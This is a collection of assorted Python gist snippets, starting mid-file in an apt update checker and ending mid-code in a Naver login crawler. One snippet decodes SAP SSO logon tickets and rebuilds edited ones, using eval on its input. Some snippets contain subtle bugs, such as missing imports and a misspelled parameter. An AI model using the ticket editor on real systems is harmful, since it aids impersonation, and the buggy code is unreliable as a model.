apt_pkg.version_compare(ver.ver_str, inst_ver.ver_str) <= 0):
#print "skipping '%s' " % ver.VerStr
continue
if isSecurityUpgrade_helper(ver):
return True
return False
def print_result(pkgs):
"""
Print package updates in a table
"""
security_updates = filter(lambda x: x.get('security'), pkgs)
text = list()
text.append('Check Time: %s' % strftime('%m/%d/%Y %H:%M:%S'))
if not pkgs:
text.append('No available updates on this machine.')
else:
# Updates are available, build a table
text.append('%d packages can be updated.' % len(pkgs))
text.append('%d updates are security updates.' % len(security_updates))
text.append('-' * 100)
# List available security updates
text.append('Package Name'.ljust(30) +
'Current Version'.ljust(30) +
'Latest Version'.ljust(30) +
'Security'.ljust(10))
text.append('-' * 100)
for pkg in pkgs:
text.append('{:<30}{:<30}{:<30}{:<10}'.format(pkg.get('name'),
pkg.get('current_version'),
pkg.get('candidate_version'),
'*' if pkg.get('security') else ''))
text.append('=' * 100)
return '\n'.join(text)
if __name__ == '__main__':
pkgs = get_update_packages()
print print_result(pkgs)
```
#### File: hard-gists/8bb867dc631433c01fd0/snippet.py
```python
from __future__ import unicode_literals
import uuid
from django.db import migrations, models
def fill_mymodel_uuid(apps, schema_editor):
db_alias = schema_editor.connection.alias
MyModel = apps.get_model('myapp', 'MyModel')
for obj in MyModel.objects.using(db_alias).all():
obj.uuid = uuid.uuid4()
obj.save()
class Migration(migrations.Migration):
""" Change model with integer pk to UUID pk. This migration presumes there
are no db constraints (foreign keys) to this table.
Note: this migration is not reversible. See the comment above the
`RemoveField` operation. Further, this migration is possible in part due
to the fact that there are currenty no foreign key restraints to this table.
"""
dependencies = [
# ...
]
operations = [
migrations.AddField(
model_name='mymodel',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.RunPython(fill_mymodel_uuid, migrations.RunPython.noop),
migrations.AlterField(
model_name='mymodel',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, unique=True),
),
# this RemoveField operation is irreversible, because in order to
# recreate it, the primary key constraint on the UUIDField would first
# have to be dropped.
migrations.RemoveField('MyModel', 'id'),
migrations.RenameField(
model_name='mymodel',
old_name='uuid',
new_name='id'
),
migrations.AlterField(
model_name='mymodel',
name='id',
field=models.UUIDField(primary_key=True, default=uuid.uuid4, serialize=False, editable=False, unique=True),
),
]
```
#### File: hard-gists/8bbcc202a915e965c6a6d4f561d0e482/snippet.py
```python
from math import radians, sin, cos, asin, sqrt, pi, atan, atan2, fabs
from time import time
import geopy.distance
import pyproj
from geographiclib.geodesic import Geodesic, Constants
import geodesy.sphere as geo
geod = pyproj.Geod(ellps='WGS84')
geodesic = Geodesic(a=Constants.WGS84_a,f=Constants.WGS84_f)
p_minsk = (27.561831, 53.902257)
p_moscow = (37.620393, 55.75396)
# https://en.wikipedia.org/wiki/Earth_radius#Mean_radius
EARTH_MEAN_RADIUS = 6371008.8
EARTH_MEAN_DIAMETER = 2 * EARTH_MEAN_RADIUS
# https://en.wikipedia.org/wiki/Earth_radius#Equatorial_radius
EARTH_EQUATORIAL_RADIUS = 6378137.0
EARTH_EQUATORIAL_METERS_PER_DEGREE = pi * EARTH_EQUATORIAL_RADIUS / 180 # 111319.49079327358
I_EARTH_EQUATORIAL_METERS_PER_DEGREE = 1 / EARTH_EQUATORIAL_METERS_PER_DEGREE
def approximate_distance(point1, point2):
'''
Approximate calculation distance
(expanding the trigonometric functions around the midpoint)
'''
lon1, lat1 = (radians(coord) for coord in point1)
lon2, lat2 = (radians(coord) for coord in point2)
cos_lat = cos((lat1+lat2)/2.0)
dx = (lat2 - lat1)
dy = (cos_lat*(lon2 - lon1))
return EARTH_MEAN_RADIUS*sqrt(dx**2 + dy**2)
def haversine_distance(point1, point2):
'''
Calculating haversine distance between two points
(see https://en.wikipedia.org/wiki/Haversine_formula,
https://www.math.ksu.edu/~dbski/writings/haversine.pdf)
Is numerically better-conditioned for small distances
'''
lon1, lat1 = (radians(coord) for coord in point1[:2])
lon2, lat2 = (radians(coord) for coord in point2[:2])
dlat = (lat2 - lat1)
dlon = (lon2 - lon1)
a = (
sin(dlat * 0.5)**2 +
cos(lat1) * cos(lat2) * sin(dlon * 0.5)**2
)
return EARTH_MEAN_DIAMETER * asin(sqrt(a))
def great_circle(point1, point2):
'''
Calculating great-circle distance
(see https://en.wikipedia.org/wiki/Great-circle_distance)
'''
lon1, lat1 = (radians(coord) for coord in point1)
lon2, lat2 = (radians(coord) for coord in point2)
dlon = fabs(lon1 - lon2)
dlat = fabs(lat1 - lat2)
numerator = sqrt(
(cos(lat2)*sin(dlon))**2 +
((cos(lat1)*sin(lat2)) - (sin(lat1)*cos(lat2)*cos(dlon)))**2)
denominator = (
(sin(lat1)*sin(lat2)) +
(cos(lat1)*cos(lat2)*cos(dlon)))
c = atan2(numerator, denominator)
return EARTH_MEAN_RADIUS*c
# 1
t = time()
for i in range(1000000):
distance = haversine_distance(p_minsk, p_moscow)
print("#1 haversine fun: %s (%s)" % (distance, time() - t))
# 2
t = time()
for i in range(1000000):
distance = great_circle(p_minsk, p_moscow)
print("#2 great circle fun: %s (%s)" % (distance, time() - t))
# 3
t = time()
for i in range(1000000):
distance = geopy.distance.vincenty(p_minsk[::-1], p_moscow[::-1], ellipsoid='WGS-84').meters
print("#3 geopy: %s (%s)" % (distance, time() - t))
# 4
# http://jswhit.github.io/pyproj/pyproj.Geod-class.html#inv
t = time()
for i in range(1000000):
_az12, _az21, distance = geod.inv(*list(p_minsk + p_moscow))
print("#4 pyproj: %s (%s)" % (distance, time() - t))
# 5
# http://geographiclib.sourceforge.net/1.46/python/code.html#geographiclib.geodesic.Geodesic.Inverse
t = time()
for i in range(1000000):
r = geodesic.Inverse(*(p_minsk[::-1] + p_moscow[::-1]), outmask=geodesic.DISTANCE)
print("#5 geographiclib: %s (%s)" % (r['s12'], time() - t))
# 6
# https://github.com/xoolive/geodesy
t = time()
for i in range(1000000):
d = geo.distance(p_minsk[::-1], p_moscow[::-1])
print("#6 geodesy: %s (%s)" % (d, time() - t))
'''
#1 haversine fun: 675656.2994818708 (2.1997811794281006)
#2 great circle fun: 675656.2994818711 (2.8947739601135254)
#3 geopy: 677789.5312317797 (32.68954396247864)
#4 pyproj: 677789.531232748 (11.323993921279907)
#5 geographiclib: 677789.5312327482 (195.3897831439972)
#6 geodesy: 675655.366226931 (0.7595169544219971)
'''
'''
Using PostGIS
# select ST_Length(ST_GeomFromText('LINESTRING(27.561831 53.902257, 37.620393 55.75396)',4326), true) as length;
length
------------------
677789.531232748
(1 row)
'''
```
#### File: hard-gists/8bfa8e25f36e6f619247203d1bc0291b/snippet.py
```python
import logging
from collections import namedtuple
import idc
import idaapi
import idautils
logger = logging.getLogger(__name__)
class BadInputError(Exception):
pass
Segment = namedtuple('SegmentBuffer', ['path', 'name', 'addr'])
def prompt_for_segment():
''' :returns: a Segment instance, or raises BadInputError '''
class MyForm(idaapi.Form):
def __init__(self):
idaapi.Form.__init__(self, """STARTITEM 0
add segment by buffer
<##buffer path:{path}>
<##segment name:{name}>
<##segment start address:{addr}>
""",
{
'path': idaapi.Form.FileInput(open=True),
'name': idaapi.Form.StringInput(),
'addr': idaapi.Form.NumericInput(tp=Form.FT_ADDR),
})
def OnFormChange(self, fid):
return 1
f = MyForm()
f.Compile()
f.path.value = ""
f.name.value = ""
f.addr.value = 0x0
ok = f.Execute()
if ok != 1:
raise BadInputError('user cancelled')
path = f.path.value
if path == "" or path is None:
raise BadInputError('bad path provided')
if not os.path.exists(path):
raise BadInputError('file doesn\'t exist')
name = f.name.value
if name == "" or name is None:
raise BadInputError('bad name provided')
addr = f.addr.value
f.Free()
return Segment(path, name, addr)
def main(argv=None):
if argv is None:
argv = sys.argv[:]
try:
seg = prompt_for_segment()
except BadInputError:
logger.error('bad input, exiting...')
return -1
with open(seg.path, 'rb') as f:
buf = f.read()
seglen = len(buf)
if seglen % 0x1000 != 0:
seglen = seglen + (0x1000 - (seglen % 0x1000))
if not idc.AddSeg(seg.addr, seg.addr + seglen, 0, 1, 0, idaapi.scPub):
logger.error('failed to add segment: 0x%x', seg.addr)
return -1
if not idc.RenameSeg(seg.addr, seg.name):
logger.warning('failed to rename segment: %s', seg.name)
if not idc.SetSegClass(seg.addr, 'CODE'):
logger.warning('failed to set segment class CODE: %s', seg.name)
if not idc.SegAlign(seg.addr, idc.saRelPara):
logger.warning('failed to align segment: %s', seg.name)
idaapi.patch_many_bytes(seg.addr, buf)
class AddSegmentPlugin(idaapi.plugin_t):
flags = idaapi.PLUGIN_KEEP
comment = "Add a segment to an IDA .idb from a file."
help = "Add a segment to an IDA .idb from a file."
wanted_name = "AddSegment"
wanted_hotkey = "Alt-F8"
def init(self):
return idaapi.PLUGIN_OK
def run(self, arg):
main()
def term(self):
pass
def PLUGIN_ENTRY():
return AddSegmentPlugin()
#if __name__ == '__main__':
# logging.basicConfig(level=logging.DEBUG)
# main()
```
#### File: hard-gists/8cb3aa12e73a6df8d6b6/snippet.py
```python
from zope.schema import getFields
from zope.interface import providedBy
from zope.interface import implementedBy
from zope.component import getUtility
from zope.component import queryUtility
from plone.behavior.interfaces import IBehavior
from plone.behavior.interfaces import IBehaviorAssignable
from plone.dexterity.interfaces import IDexterityFTI
from plone.dexterity.utils import resolveDottedName
def get_obj_schema(obj):
for iface in providedBy(obj).flattened():
for name, field in getFields(iface).items():
yield name, field
assignable = IBehaviorAssignable(obj, None)
if assignable:
for behavior in assignable.enumerateBehaviors():
for name, field in getFields(behavior.interface).items():
yield name, field
def getBehaviorsFor(context=None, portal_type=None):
if context is None and portal_type is None:
return
if context is None:
fti = getUtility(IDexterityFTI, name=portal_type)
for behavior_name in fti.behaviors:
behavior_interface = None
behavior_instance = queryUtility(IBehavior, name=behavior_name)
if not behavior_instance:
try:
behavior_interface = resolveDottedName(behavior_name)
except (ValueError, ImportError):
continue
else:
behavior_interface = behavior_instance.interface
if behavior_interface is not None:
yield behavior_interface
else:
behavior_assignable = IBehaviorAssignable(context, None)
for behavior_reg in behavior_assignable.enumerateBehaviors():
yield behavior_reg.interface
def getInterfacesFor(context=None, portal_type=None):
if context is None and portal_type is None:
return
if context is None:
kwargs = { 'portal_type': portal_type }
fti = queryUtility(IDexterityFTI, name=portal_type)
else:
kwargs = { 'context': context }
fti = queryUtility(IDexterityFTI, name=context.portal_type)
if fti is None:
return
for interface in implementedBy(resolveDottedName(fti.klass)):
yield interface
for schema in getBehaviorsFor(**kwargs):
yield schema
yield fti.lookupSchema()
```
#### File: hard-gists/8eabf18a6a79f5dbe3f4/snippet.py
```python
import sublime
import sublime_plugin
from sublime import Region, Selection
import os
import re
# { "keys": ["ctrl+r"], "command": "pepo_jump" },
class PepoJump(sublime_plugin.WindowCommand):
def run(self, **kwargs):
win = self.window
view = win.active_view()
fpath = view.file_name()
self.view = view
self.fpath = fpath
if fpath:
self.fdir = os.path.dirname(fpath)
_, ext = os.path.splitext(fpath)
self.ext = ext.lower()
else:
self.fdir = ''
self.ext = ''
sel = view.sel()[0]
self.quick_panel = getattr(self, 'quick_panel', None)
text = kwargs.get('text', None)
is_symbol = False
if self.quick_panel:
self.quick_panel = None
return self.goto_symbol_in_project(self.text)
# return self.find_files()
if text:
is_symbol = False
else:
if sel.begin() == sel.end():
text, is_symbol = self.get_undercursor()
else:
text = view.substr(sel)
if text.find('/') == -1 and text.find('.') == -1:
is_symbol = True
if not text:
self.find_files()
text = os.path.sep.join(fpath.split(os.path.sep)[-2:])
text, _ = os.path.splitext(text)
win.run_command("insert", {"characters": text})
return
self.origin_view = view
self.origin_sel = view.sel()[0]
if is_symbol:
self.goto_symbol(text)
else:
self.goto_file(text)
def goto_file(self, text):
self.text = text
win = self.window
view = self.view
row = 1
m = re.search(r'(?: *line *|:)(\d+):?$', text)
if m:
row = int(m.group(1))
text = re.sub(r':(\d+):?$', '', text)
# todo: file:// http://
# abs path ?
if text[0] == '/' or text[1] == ':' or text[:2] == '\\\\':
if self.try_open_file(text, row=row):
return
# already opened file ?
target = win.find_open_file(text)
if target:
if row > 1:
point = target.text_point(row, 0)
target.show_at_center(point)
return win.focus_view(target)
fpath = self.fpath
dirs = []
if fpath:
# relative from active_view ?
if self.try_open_file(self.fdir, text, row=row):
return
dirs.append(self.fdir)
for v in win.views():
fn = v.file_name()
if fn and v != view:
dirs.append(os.path.dirname(fn))
dirs = list(set(dirs))
# relative from project folers ? (sidebar folders)
for f in win.folders():
if self.try_open_file(f, text, row=row):
return
# relative from other views ?
for d in dirs:
if self.try_open_file(d, text, row=row):
return
# search match part of path from all open views
# ex)
# text = 'a/b/c/hello/world.txt'
# open_file_path = '/Users/someone/aaaa/bbb/a/b/c/d/e/f/hoge.txt'
# match '/a/b/c/'
# --> try_open '/Users/someone/aaaa/bbb/a/b/c/hello/world.txt'
sep = os.path.sep
if dirs and text.find(sep) > -1:
t = os.path.normpath(text).split(sep)
dirs = [d+sep for d in dirs]
for i in range(len(t)-1, 0, -1):
chunk = sep+sep.join(t[:i])+sep
for d in dirs:
j = 0
while j > -1:
j = d.find(chunk, j+1)
if j > -1 and self.try_open_file(d[:j], text, row=row):
return
self.goto_anything(text)
return
def goto_anything(self, text):
win = self.window
# open "goto anything" with text
print("show_overlay goto", text)
row = 1
m = re.search(r':(\d+)$', text)
if m:
row = int(m.group(1))
text = re.sub(r':\d+$', '', text)
win.run_command("show_overlay", {
"overlay": "goto", "show_files": True, "text": text, })
view = win.active_view()
size = view.size()
win.run_command("insert", {"characters": ' '})
if size != view.size():
win.run_command("undo")
else:
win.run_command("left_delete")
if row != 1:
win.run_command(
"insert",
{"characters": ':{}'.format(row)})
def try_open_file(self, *args, **kwargs):
path = os.path
args = list(args)
r = kwargs.get('row', 1)
# join path
fpath = args.pop(0)
for f in args:
fpath = path.join(fpath, f)
# isfile ?
if path.isfile(fpath):
print(fpath)
self.jump(fpath, r)
return True
# dir exists ?
fdir = path.dirname(fpath)
if not path.isdir(fdir):
return False
# abbr ".ext" ?
names = [f for f in os.listdir(fdir)
if path.isfile(path.join(fdir, f))]
fname = path.basename(fpath)+'.'
names = [n for n in names
if n.startswith(fname)]
if len(names) == 0:
return False
# found !
print("found", names)
files = {} # ext map
for n in names:
_, ext = path.splitext(n)
if ext:
files[ext.lower()] = path.join(fdir, n)
if len(files) == 0:
# unknown file paturn
return False
if self.ext in files:
# sameas active_view
solved = files[self.ext]
else:
print(files.values())
solved = list(files.values())[0]
print(solved)
self.jump(solved, r)
return True
def goto_symbol(self, text):
self.text = text
win = self.window
view = win.active_view()
sel = view.sel()[0]
row, col = view.rowcol(sel.begin())
row += 1
loc = self.find_in_scope(text, row)
if loc:
region, r, c = loc
self.jump(view.file_name(), r, c, text, region)
return
locs = win.lookup_symbol_in_open_files(text)
print('lookup_symbol_in_open_files: {}'.format(len(locs)))
if len(locs) == 1:
fpath, fname, rowcol = locs[0]
if fpath != view.file_name() and rowcol[0] != row:
self.jump(fpath, rowcol[0], rowcol[1], text)
return
elif len(locs) > 1:
return self.show_location_panel(
locs, name="lookup_symbol_in_open_files")
locs = win.lookup_symbol_in_index(text)
print('lookup_symbol_in_index: {}'.format(len(locs)))
if len(locs) == 1:
fpath, fname, rowcol = locs[0]
if fpath != view.file_name() and rowcol[0] != row:
self.jump(fpath, rowcol[0], rowcol[1], text)
return
elif len(locs) > 1:
return self.show_location_panel(
locs, name="lookup_symbol_in_index")
# locs = self.find_in_views(text, [view])
# if len(locs) > 1:
# return self.show_location_panel(
# locs, row=row, name="find_in_view")
# if self.find_in_other_views(text):
# return
self.goto_symbol_in_project(text)
# self.find_files()
return
def goto_symbol_in_project(self, text):
win = self.window
win.run_command("hide_panel", {"cancel": True})
win.run_command("hide_overlay")
sublime.set_timeout(
lambda: sublime.set_timeout(
lambda: self.goto_symbol_in_project_(text)))
return True
def goto_symbol_in_project_(self, text):
win = self.window
win.run_command("goto_symbol_in_project")
win.run_command("insert", {"characters": text})
return True
def jump(self, fpath, r=1, c=1, text=None, region=None):
win = self.window
view = self.origin_view
if fpath:
if r == 1 and c == 1:
target = win.open_file(fpath)
else:
target = win.open_file(
fpath+":" + str(r) + ":" + str(c),
sublime.ENCODED_POSITION)
else:
target = view
# if view != target and win.num_groups() > 1:
# g1, i1 = win.get_view_index(view)
# g2, i2 = win.get_view_index(target)
# if g1 == g2:
# # move to right group
# g = (g1 + 1) % win.num_groups()
# win.set_view_index(target, g, 0)
# win.focus_view(view)
win.focus_view(target)
self.scroll(target, fpath, r, c, text, region)
return
def scroll(self, view, fpath, r=1, c=1, text=None, region=None):
if sublime.active_window() != self.window:
print("changed active_window")
return
if self.window.active_view() != view:
print("changed active_view")
return
if view.is_loading() or view.file_name() != fpath:
print("retry scroll")
sublime.set_timeout(
lambda: self.scroll(view, fpath, r, c, text, region), 300)
return
if not region:
point = view.text_point(r-1, c-1)
if text:
line = view.line(point)
region = view.find(text, line.begin(), sublime.LITERAL)
elif r > 1:
region = Region(point, point)
if region:
if region.a == region.b and text:
region = view.find(text, region.a-1, sublime.LITERAL)
view.show_at_center(region)
view.sel().clear()
view.sel().add(region)
if not view.visible_region().contains(region):
sublime.set_timeout(
lambda: self.scroll(view, fpath, r, c, text, region), 300)
self.window.focus_view(view)
def find_files(self):
win = self.window
win.run_command("show_panel", {
"panel": "find_in_files", })
win.run_command("slurp_find_string")
return
def find_in_other_views(self, text):
win = self.window
view = win.active_view()
views = [v for v in win.views()
if v.file_name() and v.file_name() != view.file_name()]
if len(views) > 0:
locs = self.find_in_views(text, views)
if len(locs) > 0:
self.show_location_panel(locs, name="find_in_otherviews")
return True
return False
def show_location_panel(self, locations, name='quick_panel', row=False):
win = self.window
if self.quick_panel:
return
print('open: '+name)
self.quick_panel = name
self.locations = locations
view = win.active_view()
selindex = 0
items = []
for i in range(0, len(locations)):
l = locations[i]
# if row is False:
# if l[2][0] == row:
# selindex = i
# line = view.line(view.text_point(l[2][0]-1, 0))
# item = ['{:03}'.format(l[2][0])+':'+view.substr(line)]
# else:
item = self.shortest(l[0])+':'+str(l[2][0])+':'+str(l[2][1])
items.append(item)
print(items)
flags = 0
sel = view.sel()[0]
self.rollback = [(view, sel)]
win.show_quick_panel(
items, self.on_done, flags, selindex, self.on_highlight)
def shortest(self, fpath):
win = self.window
view = win.active_view()
base = view.file_name()
paths = [fpath]
if base:
base = os.path.dirname(base)
paths.append(os.path.relpath(fpath, base))
for f in win.folders():
f = f+'/'
if fpath.startswith(f):
paths.append(fpath[len(f):])
paths = [(len(s), s) for s in paths]
paths.sort()
return paths[0][1]
def on_done(self, index):
self.quick_panel = None
win = self.window
for v, r in reversed(self.rollback):
if isinstance(r, (Region, Selection)):
v.sel().clear()
v.sel().add(r)
v.show_at_center(r)
else:
g, i = r
win.set_view_index(v, g, i)
win.focus_view(self.origin_view)
if index == -1:
return
locs = self.locations
text = self.text
fpath, fname, rowcol = locs[index]
r, c = rowcol
self.jump(fpath, r, c, text)
def on_highlight(self, index):
win = self.window
locs = self.locations
fpath, fname, rowcol = locs[index]
r, c = rowcol
v = win.find_open_file(fpath)
g1, g2 = 0, 0
if v:
g1, _ = win.get_view_index(self.origin_view)
g2, i = win.get_view_index(v)
if v and g1 != g2:
win.set_view_index(v, g1, 0)
self.rollback.append((v, (g2, i)))
else:
v = win.open_file(
fpath + ":" + str(rowcol[0]) + ":" + str(rowcol[1]),
sublime.TRANSIENT | sublime.ENCODED_POSITION)
line = v.line(v.text_point(r-1, c-1))
region = v.find(self.text, line.begin(), sublime.LITERAL)
sel = v.sel()[0]
self.rollback.append((v, sel))
v.sel().clear()
v.sel().add(region)
v.show_at_center(region)
def find_in_views(self, text, views):
results = []
for view in views:
fpath = view.file_name()
if not fpath:
continue
for region in view.find_all('\\b'+text+'\\b'):
r, c = view.rowcol(region.begin())
r, c = r+1, c+1
results.append((fpath, fpath, (r, c)))
return results
def find_in_scope(self, text, row):
win = self.window
view = win.active_view()
rows = self.get_scoped_rowdict(row)
results = view.find_all('\\b'+text+'\\b')
result_up = []
result_down = []
for region in results:
r, c = view.rowcol(region.begin())
r, c = r+1, c+1
if r >= row and len(result_up) > 0:
break
if r in rows:
lv = rows[r][0]
line = view.line(region.begin())
before = view.substr(Region(line.begin(), region.begin()))
# after = view.substr(Region(region.end(), line.end()))
if re.search(r'[=\)\[\]\{\}]', before):
# maybe expr
continue
if r < row:
result_up.append((-lv, r, c, region))
elif r > row:
result_down.append((region, r, c))
if len(result_up) > 0:
result_up.sort()
result_up = [(a[3], a[1], a[2]) for a in result_up]
return result_up[0]
if len(result_down):
return result_down[0]
return None
def get_scoped_rowdict(self, row):
win = self.window
view = win.active_view()
rows = {}
text = view.substr(Region(0, view.size()))
lines = text.split("\n")
cur = 0
indents = []
for ln in lines:
if self.is_comment(ln):
indents.append(False)
continue
m = re.search(r'^[ \t]*', ln)
i = len(m.group(0))
if i == len(ln):
indents.append((cur, ln))
else:
indents.append((i, ln))
cur = i
if not indents[row-1]:
return {}
cur = indents[row-1][0]
for r in range(row, 0, -1):
if not indents[r-1]:
continue
i = indents[r-1][0]
if i == cur:
rows[r] = (i*10, indents[r-1][1])
elif i < cur:
# up scope
rows[r] = (i*10+5, indents[r-1][1])
# add same scope lines after row
for rr in range(row+1, len(indents)+1):
if not indents[rr-1]:
continue
j = indents[rr-1][0]
if j < i:
break
elif j == i:
rows[rr] = (j*10, indents[rr-1][1])
cur = i
return rows
def get_undercursor(self):
view = self.view
sel = view.sel()[0]
pos = sel.begin()
line = view.line(pos)
before = view.substr(Region(line.begin(), pos))
after = view.substr(Region(pos, line.end()))
is_symbol = False
for sep1, sep2 in [('"', '"'), ("'", "'"), ("<", ">"), ]:
if before.find(sep1) == -1 or after.find(sep2) == -1:
continue
b = before.split(sep1)
a = after.split(sep2)
if len(b) > 1 and len(b) % 2 == 0:
text = b[-1] + a[0]
text, is_symbol = self.mod_bracket_text(text, sep1, b, a)
text = re.sub(r'\{.*\}', '', text)
if text.find('./') > -1:
text = os.path.normpath(text)
return text, is_symbol
b = re.split(r'[\s\n\r]', before)
a = re.split(r'[\s\n\r]', after)
text = b[-1] + a[0]
text, is_symbol = self.mod_space_sep_text(text, b, a)
if text.find('/') > -1:
test = re.split(r'[\[\]\(\)\{\}\!\#\,\<\>]', text)
if len(test) == 1:
return text, is_symbol
is_symbol = True
# word = view.word(pos)
# text = view.substr(word).strip()
b = re.search(r'[a-zA-Z0-9_$\-]*$', before).group(0) # include '-'
a = re.search(r'^[a-zA-Z0-9_$\-]*', after).group(0)
text = b + a
if text:
view.sel().clear()
view.sel().add(Region(pos-len(b), pos+len(a)))
return text, is_symbol
def is_comment(self, ln):
ln = ln.lstrip()
lit = COMMENT_LIT.get(self.ext, None)
if lit and ln.startswith(lit):
return True
return False
def mod_bracket_text(self, text, sep, b, a):
if self.ext == '.html':
if sep in ('"', "'") and b[-2].endswith('='):
attr = b[-2].split(' ')[-1].lower()
if attr == 'class=':
return b[-1].split(' ')[-1]+a[0].split(' ')[0], True
elif attr in ('src=', 'href=', 'action='):
return text, False
else:
return text, True
elif sep == '<':
# tagName or attributeName
b = re.split(r'[\s=]', b[-1])
a = re.split(r'[\s=]', a[0])
return b[-1]+a[0], True
return text, False
def mod_space_sep_text(self, text, b, a):
if self.ext == '.py':
if len(b) > 2 and b[-2] == 'from' and a[1] == 'import':
if text[:2] == '..':
text = '{parentdir}'+text[2:]
if text[0] == '.':
text = '{currentdir}'+text[1:]
text = text.replace('.', '/')
text = text.replace('{parentdir}', '../')
text = text.replace('{currentdir}', './')
return text, False
return text, False
COMMENT_LIT = {
'.py': '#',
'.lua': '--',
'.js': '//',
'.coffee': '#',
'.rb': '#',
'.c': '//',
'.cpp': '//',
'.h': '//',
'.html': '<!--',
'.css': '/*',
}
```
#### File: hard-gists/8f3b0a678011ac74c61b/snippet.py
```python
import sys
import fileinput
import urllib.parse
import base64
import binascii
import re
import struct
def hexdump(data):
while len(data) > 0:
(cur, data) = (data[:16],data[16:])
print("| {:<48}| {:<16} |".format(str(re.sub(b'(.{2})', b'\\1 ', binascii.hexlify(cur)), 'ascii'), str(re.sub(b'[\x00-\x1f\x80-\xff]', b'.', cur), 'ascii')))
def decodeSAPToken(token, format=False):
(v, id, token) = (token[0], token[1:5], token[5:])
if format:
print("Version = " + str(v))
print("ID = " + str(id, 'ascii'))
else:
print(str(v) + ":" + str(id, 'ascii'))
while len(token) > 0:
((type, length), token) = (struct.unpack('!BH', token[:3]), token[3:])
(value, token) = (token[:length], token[length:])
if format:
print("Type={:02x} Length={:d}".format(type, length))
if type == 0x01 or type == 0x0a:
print("Username = " + str(value, 'ascii'))
elif type == 0x02:
print("Client = " + str(value, 'ascii'))
elif type == 0x03:
print("System = " + str(value, 'ascii'))
elif type == 0x04:
print("Toke issued at = " + str(value, 'ascii'))
elif type == 0x88:
print("Authentication type = " + str(value, 'ascii'))
elif type == 0xff:
print("Signature:")
hexdump(value)
else:
hexdump(value)
print()
else:
print(str(type) + ":" + str(value)[2:-1])
def usage():
print("Usage:\n" + sys.argv[0] + " decode|decode2 <token>\n - OR -\n" + sys.argv[0] + " encode [<decode-formatted-files> ...]")
sys.exit()
### Main ###
if len(sys.argv) < 2:
usage()
if sys.argv[1] in ('decode', 'decode2'):
if len(sys.argv) != 3:
usage()
try:
token = base64.b64decode(bytes(urllib.parse.unquote(sys.argv[2], 'ascii'), 'ascii'))
except binascii.Error:
try:
token = base64.b64decode(bytes(urllib.parse.unquote(sys.argv[2] + '=', 'ascii'), 'ascii'))
except binascii.Error:
try:
token = base64.b64decode(bytes(urllib.parse.unquote(sys.argv[2] + '==', 'ascii'), 'ascii'))
except:
print("Failed to complete missing padding - giving up!")
sys.exit()
if sys.argv[1] == 'decode':
decodeSAPToken(token)
else:
print("=== Raw ===")
hexdump(token)
print("=== Decoded ===")
decodeSAPToken(token, True)
elif sys.argv[1] == 'encode':
firstline = True
for line in fileinput.input(sys.argv[2:]):
line = line.rstrip("\n")
if firstline:
(v, id) = line.split(":")
ssotoken = struct.pack('!B4s', int(v), bytes(id, 'ascii'))
firstline = False
else:
(type, value) = line.split(":", 1)
value = eval("b'''" + value + "'''")
length = len(value)
ssotoken += struct.pack('!BH', int(type), int(length)) + value
print(urllib.parse.quote(str(base64.b64encode(ssotoken), 'ascii')))
```
#### File: hard-gists/8ff8e31ee1a2a9585a5a/snippet.py
```python
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA
from Crypto import Random
import base64
import StringIO
# passphrase, random string => private key, public key pair
# encrypt with public key
# decrypt with pem, passphrase
def gen_key_pair(passpharse):
random_generator = Random.new().read
key = RSA.generate(2048, random_generator)
return key.exportKey(passphrase=passphrase), key.publickey().exportKey()
def rsa_encrypt(message, pub):
keystream = StringIO.StringIO(pub)
pubkey = RSA.importKey(keystream.read())
h = SHA.new(message)
cipher = PKCS1_v1_5.new(pubkey)
return base64.encodestring(cipher.encrypt(message+h.digest()))
def rsa_decrypt(ciphertext, pem, passphrase):
ciphertext = base64.decodestring(ciphertext)
keystream = StringIO.StringIO(pem)
pemkey = RSA.importKey(keystream.read(), passphrase=passphrase)
dsize = SHA.digest_size
sentinel = Random.new().read(15+dsize)
cipher = PKCS1_v1_5.new(pemkey)
message = cipher.decrypt(ciphertext, sentinel)
digest = SHA.new(message[:-dsize]).digest()
if digest == message[-dsize:]:
return message[:-dsize]
else:
raise ValueError('Cannot decrypt message')
if __name__ == '__main__':
message = 'To be encrypted'
passphrase = '<PASSWORD>'
pem, pub = gen_key_pair(passphrase)
print 'Private Key:\n%s\n' % pem
print 'Public Key:\n%s\n' % pub
encdata = rsa_encrypt(message, pub)
print 'Encrypted Message:\n', encdata
decdata = rsa_decrypt(encdata, pem, passphrase)
print 'Decrypted Message:\n', decdata
```
#### File: hard-gists/900514/snippet.py
```python
from twitter_search import search_twitter
import random
import sys
import re
class Thingy(object):
def __init__(self, words):
self.words = words
self.begins = dict([(word, []) for word in words])
self.ends = dict([(word, []) for word in words])
def start(self):
import urllib
query = '?' + urllib.urlencode({'q': ' OR '.join(self.words), 'rpp': 100})
search_twitter(query, self.feed, maxpages=20)
def feed(self, tweet):
text = tweet['text']
for s in self.words:
loc = text.find(s.lower())
if loc != -1:
begins = text[loc:].split(" ")[:random.randrange(2,8)]
ends = text[:loc+len(s)].split(" ")[-random.randrange(2,8):]
self.begins[s].append(begins)
self.ends[s].append(ends)
def generate(self):
for i in range(1000):
s = random.choice(self.words)
begin = ' '.join(random.choice(self.begins[s]))
end = ' '.join(random.choice(self.ends[s]))
begin2 = ' '.join(random.choice(self.begins[s]))
begin3 = ' '.join(random.choice(self.begins[s]))
target = '\n\t'.join([': '.join([end, begin]), begin2, begin3])
if re.search(r'^[a-zA-Z,.:;?!\- \n\t]*$', target):
print target
generator = Thingy(['voicing', 'shucked', 'slant'])
generator.start()
generator.generate()
```
#### File: hard-gists/9012444/snippet.py
```python
from ghost import Ghost
from config import COOKIE_FILE, LOGIN_ID, LOGIN_PW
import urllib2
import cookielib
import Cookie
class NaverCrawler:
# 새 크롤러를 만듭니다.
def __init__(self, id, pw, displayFlag = False):
# 새 Ghost instance를 만들어서 사용합니다.
self.ghost = Ghost(display = displayFlag, wait_timeout = 20)
self.currentPage = None
self.login(id, pw)
# 주어진 페이지를 엽니다. 이미 그 페이지에 있으면 그대로 있습니다.
def openPage(self, url):
if self.currentPage == url:
return
self.ghost.open(url)
self.ghost.wait_for_page_loaded()
self.currentPage = url
# 네이버 로그인을 수행합니다.
def login(self, id, pw):
# 네이버 메인 페이지를 엽니다.
self.openPage('http://www.naver.com')
# inner frame에 들어있는 로그인 폼에 값을 채워넣고 클릭을 지시합니다.
# 이부분은 javascript를 활용했습니다.
self.ghost.evaluate("""
(function() {
